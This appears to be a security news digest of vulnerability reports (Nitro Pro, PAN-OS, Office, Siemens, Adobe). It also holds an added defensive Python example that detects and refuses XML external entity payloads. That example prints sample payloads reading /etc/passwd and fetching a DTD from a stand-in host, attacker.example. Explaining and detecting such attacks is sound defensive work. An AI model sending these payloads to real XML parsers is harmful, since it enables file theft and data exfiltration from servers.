Security News
Two recently addressed vulnerabilities in the Nitro Pro PDF editor could be exploited by malicious actors to execute code remotely on affected hosts, according to Cisco's Talos threat intelligence and research group. Nitro Pro is a piece of software designed for reading, editing, signing, and saving PDF files.
Vulnerabilities discovered by a researcher at industrial cybersecurity firm Claroty in Opto 22's SoftPAC virtual programmable automation controller expose operational technology networks to attacks. SoftPAC has three main components: Monitor, Agent and the virtual controller itself.
That's just one of the vulnerabilities the agencies say they have seen exploited this year by what they describe as sophisticated foreign cyber actors. All that is for 2020 alone, and we still haven't gotten to the meat of the report: the ten most exploited vulnerabilities for the years 2016 through 2019.
Palo Alto Networks this week informed customers that it has patched over two dozen vulnerabilities in PAN-OS, the software that runs on the company's next-generation firewalls. Another potentially serious issue is CVE-2020-2012, a high-severity XML external entity (XXE) vulnerability that allows a remote, unauthenticated attacker with access to the Panorama management interface to read arbitrary files from the system.
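XXE file reads of the class CVE-2020-2012 belongs to work the same way regardless of product: the attacker submits XML with a DOCTYPE that declares an entity pointing at a local file or remote URL, and a parser that resolves external entities splices the file contents into the document. The block below is an added example, not code from Palo Alto Networks and not Panorama's real request format; the request element names, the file path and the attacker.example host are all constructed. It shows the payload shape and a pre-parse check that refuses any document carrying a DOCTYPE or an external entity declaration before it reaches a parser.

```python
"""Refuse XML that declares a DTD or external entities before parsing it.

Added example. The request bodies are constructed to show the shape of
XXE payloads; they are not any vendor's actual API format.
"""
import re
import xml.etree.ElementTree as ET

# An API that never expects a DTD can reject any DOCTYPE outright. Within a
# DTD, SYSTEM/PUBLIC entity declarations are what turn parsing into a file
# read or an outbound request; parameter entities (%name) are the usual
# vehicle for pulling the real declaration from an external DTD.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def classify_xml(body: bytes) -> str:
    """Return 'external-entity', 'doctype' or 'clean' for a request body."""
    if _EXTERNAL_ENTITY_RE.search(body):
        return "external-entity"
    if _DOCTYPE_RE.search(body):
        return "doctype"
    return "clean"


def safe_parse(body: bytes) -> ET.Element:
    """Parse only documents with no DTD at all.

    ElementTree itself does not fetch external entities, but the same
    pre-check protects parsers (or parser configurations) that do.
    """
    verdict = classify_xml(body)
    if verdict != "clean":
        raise ValueError(f"refusing XML with {verdict}")
    return ET.fromstring(body)


def is_rejected(body: bytes) -> bool:
    """True if safe_parse() refuses the body."""
    try:
        safe_parse(body)
    except ValueError:
        return True
    return False


# Constructed samples (hypothetical element names, path and host).
# Classic in-band file read: the file contents land in <name>.
FILE_READ_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b"<!DOCTYPE request [\n"
    b'  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    b"]>\n"
    b"<request><name>&xxe;</name></request>\n"
)

# Out-of-band variant: the external DTD carries the real entity, so the
# document body looks harmless.
PARAMETER_ENTITY_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b"<!DOCTYPE request [\n"
    b'  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">\n'
    b"  %dtd;\n"
    b"]>\n"
    b"<request/>\n"
)

# Internal entity only: no file access, but still a DTD we did not ask for.
INTERNAL_ENTITY_ONLY = (
    b'<!DOCTYPE request [ <!ENTITY ver "1.0"> ]>'
    b"<request><v>&ver;</v></request>"
)

BENIGN = b"<request><name>ops-fw-01</name></request>"


if __name__ == "__main__":
    for label, body in [
        ("file-read", FILE_READ_PAYLOAD),
        ("parameter-entity", PARAMETER_ENTITY_PAYLOAD),
        ("internal-entity", INTERNAL_ENTITY_ONLY),
        ("benign", BENIGN),
    ]:
        print(f"{label:17s} -> {classify_xml(body)} rejected={is_rejected(body)}")
```

The regex pre-check is a belt-and-braces filter, not the fix: it only sees the bytes as written, so a body in an encoding it does not inspect (UTF-16, for instance) would slip past it. Decode to a known encoding first, and disable DTD processing and external entity resolution in the parser configuration itself, which is where the vendor patch for an XXE bug belongs.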
Several Microsoft Office vulnerabilities that were patched years ago continue to be among the security flaws most exploited in attacks, the U.S. government warns. The bugs, the alert underlines, are routinely exploited by foreign cyber actors in attacks targeting both the public and private sectors, and the risks associated with them could be mitigated "through an increased effort to patch systems and implement programs to keep system patching up to date."
Siemens informed customers on Tuesday that some of its low- and high-voltage power meters are affected by the Wind River VxWorks vulnerabilities dubbed Urgent/11. According to Siemens, its Power Meter 9410 and 9810 series products are affected by ten of the eleven Urgent/11 flaws.
The US Cybersecurity and Infrastructure Security Agency is urging organizations to patch a slew of old and new software vulnerabilities that are routinely exploited by foreign cyber actors and cyber criminals. "Foreign cyber actors continue to exploit publicly known, and often dated, software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available," the agency noted.
Microsoft's May 2020 security updates patch 111 vulnerabilities, including 16 rated critical, but none of them has been exploited in attacks or disclosed before fixes were released. "For the past three months, Microsoft has been issuing very large Patch Tuesday releases, with March fixing 115 vulnerabilities, April with 113, and now May with 111. This shows their commitment to resolving vulnerabilities in their software, and their continued engagement with the security community."
Adobe has patched a total of 36 vulnerabilities in its Acrobat and Reader products and the DNG software development kit. Several researchers have been credited by Adobe for reporting the Acrobat and Reader vulnerabilities.
Two high-severity vulnerabilities addressed recently in SiteOrigin's Page Builder WordPress plugin could allow an attacker to execute code in a website administrator's browser. Page Builder by SiteOrigin is a page-creation plugin that lets users build column-based content that adapts to mobile devices, and it supports the most common widgets.